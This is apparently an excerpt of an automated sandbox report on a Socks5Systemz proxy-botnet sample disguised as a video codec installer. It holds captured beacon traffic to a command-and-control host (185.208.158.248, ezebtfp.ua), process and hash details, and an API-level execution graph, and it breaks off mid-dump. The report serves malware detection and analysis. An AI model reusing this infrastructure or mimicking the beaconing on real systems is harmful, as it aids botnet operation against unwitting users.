    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.5 | 49776 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:41:00.934550047 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:41:01.898088932 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:41:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.5 | 49777 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:41:02.022850990 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:41:02.735198975 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:41:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.5 | 49778 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:41:02.920604944 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:41:03.596120119 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:41:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.5 | 49779 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:41:03.724756002 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:41:04.426274061 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:41:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.5 | 49780 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:41:04.562783003 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
    Host: ezebtfp.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:41:05.350626945 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 03 Oct 2024 06:41:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    63192.168.2.549781185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:41:05.683391094 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:41:07.092375040 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:41:07.092387915 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:41:07.094438076 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    64 | 192.168.2.5 | 49782 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Oct 3, 2024 08:41:07.215607882 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:41:07.965732098 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:41:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Target ID:0
                                                                                                    Start time:02:39:01
                                                                                                    Start date:03/10/2024
                                                                                                    Path:C:\Users\user\Desktop\L9rm7AX4mp.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\L9rm7AX4mp.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:8'333'974 bytes
                                                                                                    MD5 hash:0396163369529CD5B010E3C35A2066C5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:1
                                                                                                    Start time:02:39:01
                                                                                                    Start date:03/10/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp" /SL5="$20420,8045603,54272,C:\Users\user\Desktop\L9rm7AX4mp.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:709'120 bytes
                                                                                                    MD5 hash:16C9D19AB32C18671706CEFEE19B6949
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 4%, ReversingLabs
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:3
                                                                                                    Start time:02:39:03
                                                                                                    Start date:03/10/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe" -i
                                                                                                    Imagebase:0x400000
                                                                                                    File size:2'586'624 bytes
                                                                                                    MD5 hash:4AC9B0BE70B6E01BFD47FFA47289DED7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3288670577.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:21.2%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:2.4%
                                                                                                      Total number of Nodes:1498
                                                                                                      Total number of Limit Nodes:22
                                                                                                      execution_graph 4979 409c40 5020 4030dc 4979->5020 4981 409c56 5023 4042e8 4981->5023 4983 409c5b 5026 40457c GetModuleHandleA GetProcAddress 4983->5026 4989 409c6a 5043 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4989->5043 5006 409d43 5105 4074a0 5006->5105 5008 409d05 5008->5006 5138 409aa0 5008->5138 5009 409d84 5109 407a28 5009->5109 5010 409d69 5010->5009 5011 409aa0 4 API calls 5010->5011 5011->5009 5013 409da9 5119 408b08 5013->5119 5017 409def 5018 408b08 21 API calls 5017->5018 5019 409e28 5017->5019 5018->5017 5148 403094 5020->5148 5022 4030e1 GetModuleHandleA GetCommandLineA 5022->4981 5025 404323 5023->5025 5149 403154 5023->5149 5025->4983 5027 404598 5026->5027 5028 40459f GetProcAddress 5026->5028 5027->5028 5029 4045b5 GetProcAddress 5028->5029 5030 4045ae 5028->5030 5031 4045c4 SetProcessDEPPolicy 5029->5031 5032 4045c8 5029->5032 5030->5029 5031->5032 5033 4065b8 5032->5033 5162 405c98 5033->5162 5042 406604 6F541CD0 5042->4989 5044 4090f7 5043->5044 5289 406fa0 SetErrorMode 5044->5289 5049 403198 4 API calls 5050 40913c 5049->5050 5051 409b30 GetSystemInfo VirtualQuery 5050->5051 5052 409be4 5051->5052 5053 409b5a 5051->5053 5057 409768 5052->5057 5053->5052 5054 409bc5 VirtualQuery 5053->5054 5055 409b84 VirtualProtect 5053->5055 5056 409bb3 VirtualProtect 5053->5056 5054->5052 5054->5053 5055->5053 5056->5054 5299 406bd0 GetCommandLineA 5057->5299 5059 409825 5061 4031b8 4 API calls 5059->5061 5060 406c2c 6 API calls 5063 409785 5060->5063 5062 40983f 5061->5062 5065 406c2c 5062->5065 5063->5059 5063->5060 5064 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5063->5064 5064->5063 5066 406c53 GetModuleFileNameA 5065->5066 5067 406c77 GetCommandLineA 5065->5067 5068 403278 4 API calls 5066->5068 5069 406c7c 5067->5069 5070 406c75 5068->5070 5071 406c81 5069->5071 5072 406af0 4 API calls 5069->5072 5075 406c89 
5069->5075 5073 406ca4 5070->5073 5074 403198 4 API calls 5071->5074 5072->5069 5076 403198 4 API calls 5073->5076 5074->5075 5077 40322c 4 API calls 5075->5077 5078 406cb9 5076->5078 5077->5073 5079 4031e8 5078->5079 5080 4031ec 5079->5080 5083 4031fc 5079->5083 5082 403254 4 API calls 5080->5082 5080->5083 5081 403228 5085 4074e0 5081->5085 5082->5083 5083->5081 5084 4025ac 4 API calls 5083->5084 5084->5081 5086 4074ea 5085->5086 5320 407576 5086->5320 5323 407578 5086->5323 5087 407516 5088 40752a 5087->5088 5326 40748c GetLastError 5087->5326 5092 409bec FindResourceA 5088->5092 5093 409c01 5092->5093 5094 409c06 SizeofResource 5092->5094 5097 409aa0 4 API calls 5093->5097 5095 409c13 5094->5095 5096 409c18 LoadResource 5094->5096 5098 409aa0 4 API calls 5095->5098 5099 409c26 5096->5099 5100 409c2b LockResource 5096->5100 5097->5094 5098->5096 5101 409aa0 4 API calls 5099->5101 5102 409c37 5100->5102 5103 409c3c 5100->5103 5101->5100 5104 409aa0 4 API calls 5102->5104 5103->5008 5135 407918 5103->5135 5104->5103 5106 4074b4 5105->5106 5107 4074c4 5106->5107 5108 4073ec 20 API calls 5106->5108 5107->5010 5108->5107 5110 407a35 5109->5110 5111 405880 4 API calls 5110->5111 5112 407a89 5110->5112 5111->5112 5113 407918 InterlockedExchange 5112->5113 5114 407a9b 5113->5114 5115 405880 4 API calls 5114->5115 5116 407ab1 5114->5116 5115->5116 5117 405880 4 API calls 5116->5117 5118 407af4 5116->5118 5117->5118 5118->5013 5128 408b82 5119->5128 5134 408b39 5119->5134 5120 408bcd 5434 407cb8 5120->5434 5121 407cb8 21 API calls 5121->5134 5122 407cb8 21 API calls 5122->5128 5125 408be4 5127 4031b8 4 API calls 5125->5127 5126 4034f0 4 API calls 5126->5128 5129 408bfe 5127->5129 5128->5120 5128->5122 5128->5126 5132 403420 4 API calls 5128->5132 5133 4031e8 4 API calls 5128->5133 5145 404c10 5129->5145 5130 403420 4 API calls 5130->5134 5131 4031e8 4 API calls 5131->5134 5132->5128 5133->5128 5134->5121 5134->5128 5134->5130 5134->5131 5425 4034f0 5134->5425 5460 4078c4 
5135->5460 5139 409ac1 5138->5139 5140 409aa9 5138->5140 5142 405880 4 API calls 5139->5142 5141 405880 4 API calls 5140->5141 5144 409abb 5141->5144 5143 409ad2 5142->5143 5143->5006 5144->5006 5146 402594 4 API calls 5145->5146 5147 404c1b 5146->5147 5147->5017 5148->5022 5150 403164 5149->5150 5151 40318c TlsGetValue 5149->5151 5150->5025 5152 403196 5151->5152 5153 40316f 5151->5153 5152->5025 5157 40310c 5153->5157 5155 403174 TlsGetValue 5156 403184 5155->5156 5156->5025 5158 403120 LocalAlloc 5157->5158 5159 403116 5157->5159 5160 40313e TlsSetValue 5158->5160 5161 403132 5158->5161 5159->5158 5160->5161 5161->5155 5234 405930 5162->5234 5165 405270 GetSystemDefaultLCID 5167 4052a6 5165->5167 5166 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5166->5167 5167->5166 5168 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5167->5168 5169 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5167->5169 5171 405308 5167->5171 5168->5167 5169->5167 5170 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5170->5171 5171->5170 5172 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5171->5172 5173 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5171->5173 5174 40538b 5171->5174 5172->5171 5173->5171 5267 4031b8 5174->5267 5177 4053b4 GetSystemDefaultLCID 5271 4051fc GetLocaleInfoA 5177->5271 5180 4031e8 4 API calls 5181 4053f4 5180->5181 5182 4051fc 5 API calls 5181->5182 5183 405409 5182->5183 5184 4051fc 5 API calls 5183->5184 5185 40542d 5184->5185 5277 405248 GetLocaleInfoA 5185->5277 5188 405248 GetLocaleInfoA 5189 40545d 5188->5189 5190 4051fc 5 API calls 5189->5190 5191 405477 5190->5191 5192 405248 GetLocaleInfoA 5191->5192 5193 405494 5192->5193 5194 4051fc 5 API calls 5193->5194 5195 4054ae 5194->5195 5196 4031e8 4 API calls 5195->5196 5197 4054bb 5196->5197 5198 4051fc 5 API calls 5197->5198 5199 4054d0 5198->5199 5200 4031e8 4 API calls 5199->5200 5201 4054dd 5200->5201 5202 
405248 GetLocaleInfoA 5201->5202 5203 4054eb 5202->5203 5204 4051fc 5 API calls 5203->5204 5205 405505 5204->5205 5206 4031e8 4 API calls 5205->5206 5207 405512 5206->5207 5208 4051fc 5 API calls 5207->5208 5209 405527 5208->5209 5210 4031e8 4 API calls 5209->5210 5211 405534 5210->5211 5212 4051fc 5 API calls 5211->5212 5213 405549 5212->5213 5214 405566 5213->5214 5215 405557 5213->5215 5217 40322c 4 API calls 5214->5217 5285 40322c 5215->5285 5218 405564 5217->5218 5219 4051fc 5 API calls 5218->5219 5220 405588 5219->5220 5221 4055a5 5220->5221 5222 405596 5220->5222 5224 403198 4 API calls 5221->5224 5223 40322c 4 API calls 5222->5223 5225 4055a3 5223->5225 5224->5225 5279 4033b4 5225->5279 5227 4055c7 5228 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5227->5228 5229 4055e1 5228->5229 5230 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5229->5230 5231 4055fb 5230->5231 5232 405ce4 GetVersionExA 5231->5232 5233 405cfb 5232->5233 5233->5042 5235 40593c 5234->5235 5242 404ccc LoadStringA 5235->5242 5238 4031e8 4 API calls 5239 40596d 5238->5239 5245 403198 5239->5245 5249 403278 5242->5249 5246 4031b7 5245->5246 5247 40319e 5245->5247 5246->5165 5247->5246 5263 4025ac 5247->5263 5254 403254 5249->5254 5251 403288 5252 403198 4 API calls 5251->5252 5253 4032a0 5252->5253 5253->5238 5255 403274 5254->5255 5256 403258 5254->5256 5255->5251 5259 402594 5256->5259 5258 403261 5258->5251 5260 402598 5259->5260 5261 4025a2 5259->5261 5260->5261 5262 403154 4 API calls 5260->5262 5261->5258 5261->5261 5262->5261 5264 4025b0 5263->5264 5266 4025ba 5263->5266 5265 403154 4 API calls 5264->5265 5264->5266 5265->5266 5266->5246 5269 4031be 5267->5269 5268 4031e3 5268->5177 5269->5268 5270 4025ac 4 API calls 5269->5270 5270->5269 5272 405223 5271->5272 5273 405235 5271->5273 5274 403278 4 API calls 5272->5274 5275 40322c 4 API calls 5273->5275 5276 405233 5274->5276 5275->5276 5276->5180 5278 405264 5277->5278 5278->5188 5280 4033bc 5279->5280 5281 403254 4 API 
calls 5280->5281 5282 4033cf 5281->5282 5283 4031e8 4 API calls 5282->5283 5284 4033f7 5283->5284 5287 403230 5285->5287 5286 403252 5286->5218 5287->5286 5288 4025ac 4 API calls 5287->5288 5288->5286 5297 403414 5289->5297 5292 406fee 5293 407284 FormatMessageA 5292->5293 5294 4072aa 5293->5294 5295 403278 4 API calls 5294->5295 5296 4072c7 5295->5296 5296->5049 5298 403418 LoadLibraryA 5297->5298 5298->5292 5306 406af0 5299->5306 5301 406bf3 5302 406c05 5301->5302 5303 406af0 4 API calls 5301->5303 5304 403198 4 API calls 5302->5304 5303->5301 5305 406c1a 5304->5305 5305->5063 5307 406b1c 5306->5307 5308 403278 4 API calls 5307->5308 5309 406b29 5308->5309 5316 403420 5309->5316 5311 406b31 5312 4031e8 4 API calls 5311->5312 5313 406b49 5312->5313 5314 403198 4 API calls 5313->5314 5315 406b6b 5314->5315 5315->5301 5317 403426 5316->5317 5319 403437 5316->5319 5318 403254 4 API calls 5317->5318 5317->5319 5318->5319 5319->5311 5321 407578 5320->5321 5322 4075b7 CreateFileA 5321->5322 5322->5087 5324 403414 5323->5324 5325 4075b7 CreateFileA 5324->5325 5325->5087 5329 4073ec 5326->5329 5330 407284 5 API calls 5329->5330 5332 407414 5330->5332 5331 407434 5341 405880 5331->5341 5332->5331 5338 405184 5332->5338 5335 407443 5336 403198 4 API calls 5335->5336 5337 407460 5336->5337 5337->5088 5345 405198 5338->5345 5342 405887 5341->5342 5343 4031e8 4 API calls 5342->5343 5344 40589f 5343->5344 5344->5335 5346 4051b5 5345->5346 5353 404e48 5346->5353 5349 4051e1 5350 403278 4 API calls 5349->5350 5352 405193 5350->5352 5352->5331 5356 404e63 5353->5356 5354 404e75 5354->5349 5358 404bd4 5354->5358 5356->5354 5361 404f6a 5356->5361 5368 404e3c 5356->5368 5359 405930 5 API calls 5358->5359 5360 404be5 5359->5360 5360->5349 5362 404f7b 5361->5362 5366 404fc9 5361->5366 5364 40504f 5362->5364 5362->5366 5367 404fe7 5364->5367 5375 404e28 5364->5375 5366->5367 5371 404de4 5366->5371 5367->5356 5369 403198 4 API calls 5368->5369 5370 404e46 5369->5370 5370->5356 5372 
404df2 5371->5372 5378 404bec 5372->5378 5374 404e20 5374->5366 5391 4039a4 5375->5391 5381 4059a0 5378->5381 5380 404c05 5380->5374 5382 4059ae 5381->5382 5383 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5382->5383 5384 4059d8 5383->5384 5385 405184 19 API calls 5384->5385 5386 4059e6 5385->5386 5387 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5386->5387 5388 4059f1 5387->5388 5389 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5388->5389 5390 405a0b 5389->5390 5390->5380 5392 4039ab 5391->5392 5397 4038b4 5392->5397 5394 4039cb 5395 403198 4 API calls 5394->5395 5396 4039d2 5395->5396 5396->5367 5398 4038d5 5397->5398 5399 4038c8 5397->5399 5401 403934 5398->5401 5402 4038db 5398->5402 5400 403780 6 API calls 5399->5400 5405 4038d0 5400->5405 5403 403993 5401->5403 5404 40393b 5401->5404 5406 4038e1 5402->5406 5407 4038ee 5402->5407 5408 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5403->5408 5409 403941 5404->5409 5410 40394b 5404->5410 5405->5394 5411 403894 6 API calls 5406->5411 5412 403894 6 API calls 5407->5412 5408->5405 5413 403864 9 API calls 5409->5413 5414 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5410->5414 5411->5405 5415 4038fc 5412->5415 5413->5405 5416 40395d 5414->5416 5417 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5415->5417 5419 403864 9 API calls 5416->5419 5418 403917 5417->5418 5421 40374c VariantClear 5418->5421 5420 403976 5419->5420 5423 40374c VariantClear 5420->5423 5422 40392c 5421->5422 5422->5394 5424 40398b 5423->5424 5424->5394 5426 4034fd 5425->5426 5432 40352d 5425->5432 5428 403526 5426->5428 5430 403509 5426->5430 5427 403198 4 API calls 5433 403517 5427->5433 5429 403254 4 API calls 5428->5429 5429->5432 5440 4025c4 5430->5440 5432->5427 5433->5134 5435 407cd3 5434->5435 5439 407cc8 5434->5439 5444 407c5c 5435->5444 5438 405880 4 API calls 5438->5439 5439->5125 5441 4025ca 5440->5441 5442 4025dc 5441->5442 5443 403154 4 API calls 
5441->5443 5442->5433 5442->5442 5443->5442 5445 407c70 5444->5445 5446 407caf 5444->5446 5445->5446 5448 407bac 5445->5448 5446->5438 5446->5439 5449 407bb7 5448->5449 5452 407bc8 5448->5452 5450 405880 4 API calls 5449->5450 5450->5452 5451 4074a0 20 API calls 5453 407bdc 5451->5453 5452->5451 5454 4074a0 20 API calls 5453->5454 5455 407bfd 5454->5455 5456 407918 InterlockedExchange 5455->5456 5457 407c12 5456->5457 5458 407c28 5457->5458 5459 405880 4 API calls 5457->5459 5458->5445 5459->5458 5461 4078d6 5460->5461 5462 4078e7 5460->5462 5463 4078db InterlockedExchange 5461->5463 5462->5008 5463->5462 6236 409e47 6237 409e6c 6236->6237 6238 4098f4 15 API calls 6237->6238 6242 409e71 6238->6242 6239 409ec4 6270 4026c4 GetSystemTime 6239->6270 6241 409ec9 6243 409330 32 API calls 6241->6243 6242->6239 6244 408dd8 4 API calls 6242->6244 6245 409ed1 6243->6245 6246 409ea0 6244->6246 6247 4031e8 4 API calls 6245->6247 6249 409ea8 MessageBoxA 6246->6249 6248 409ede 6247->6248 6250 406928 5 API calls 6248->6250 6249->6239 6251 409eb5 6249->6251 6252 409eeb 6250->6252 6253 405854 5 API calls 6251->6253 6254 4066c0 5 API calls 6252->6254 6253->6239 6255 409efb 6254->6255 6256 406638 5 API calls 6255->6256 6257 409f0c 6256->6257 6258 403340 4 API calls 6257->6258 6259 409f1a 6258->6259 6260 4031e8 4 API calls 6259->6260 6261 409f2a 6260->6261 6262 4074e0 23 API calls 6261->6262 6263 409f69 6262->6263 6264 402594 4 API calls 6263->6264 6265 409f89 6264->6265 6266 407a28 5 API calls 6265->6266 6267 409fcb 6266->6267 6268 407cb8 21 API calls 6267->6268 6269 409ff2 6268->6269 6270->6241 6197 407548 6198 407554 CloseHandle 6197->6198 6199 40755d 6197->6199 6198->6199 6649 402b48 RaiseException 6200 407749 6201 4076dc WriteFile 6200->6201 6210 407724 6200->6210 6202 4076e8 6201->6202 6203 4076ef 6201->6203 6204 40748c 21 API calls 6202->6204 6205 407700 6203->6205 6206 4073ec 20 API calls 6203->6206 6204->6203 6206->6205 6207 4077e0 6208 4078db InterlockedExchange 6207->6208 
6209 407890 6207->6209 6211 4078e7 6208->6211 6210->6200 6210->6207 6650 40294a 6651 402952 6650->6651 6652 402967 6651->6652 6653 403554 4 API calls 6651->6653 6653->6651 6654 403f4a 6655 403f53 6654->6655 6656 403f5c 6654->6656 6658 403f07 6655->6658 6661 403f09 6658->6661 6659 403f3c 6659->6656 6663 403154 4 API calls 6661->6663 6665 403e9c 6661->6665 6669 403f3d 6661->6669 6681 403e9c 6661->6681 6662 403ecf 6662->6656 6663->6661 6664 403ef2 6666 402674 4 API calls 6664->6666 6665->6659 6665->6664 6670 403ea9 6665->6670 6672 403e8e 6665->6672 6666->6662 6669->6656 6670->6662 6671 402674 4 API calls 6670->6671 6671->6662 6673 403e4c 6672->6673 6674 403e67 6673->6674 6675 403e62 6673->6675 6676 403e7b 6673->6676 6679 403e78 6674->6679 6680 402674 4 API calls 6674->6680 6677 403cc8 4 API calls 6675->6677 6678 402674 4 API calls 6676->6678 6677->6674 6678->6679 6679->6664 6679->6670 6680->6679 6682 403ed7 6681->6682 6688 403ea9 6681->6688 6684 403ef2 6682->6684 6686 403e8e 4 API calls 6682->6686 6683 403ecf 6683->6661 6685 402674 4 API calls 6684->6685 6685->6683 6687 403ee6 6686->6687 6687->6684 6687->6688 6688->6683 6689 402674 4 API calls 6688->6689 6689->6683 6698 405150 6699 